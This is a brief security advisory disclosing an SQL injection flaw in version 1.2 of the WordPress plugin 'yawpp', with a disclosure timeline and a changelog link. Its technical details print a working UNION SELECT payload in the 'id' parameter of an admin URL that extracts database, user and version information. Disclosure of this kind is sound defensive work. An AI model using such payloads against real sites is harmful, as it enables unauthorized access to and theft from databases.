Plugin Details
Plugin Name: wp-plugin : yawpp
Effected Version : 1.2 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Contributor
CVE Number :
Identified by : Anantshri
Disclosure Timeline
-
December 21, 2013: Vendor Contacted
- January 7, 2014 : Plugin Updated
- May 28, 2014 : Public Disclosure
Technical Details
http://localhost/wp-admin/admin.php?page=yawpp§ion=update&id=2 union select 1,3,concat(database(),system_user(),@@version),2,user(),4
Vulnerable Parameter : “id”
Vulnerable pages : multiple pages where it is used.
Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=834445%40yawpp&old=824042%40yawpp&sfp_email=&sfph_mail=#file36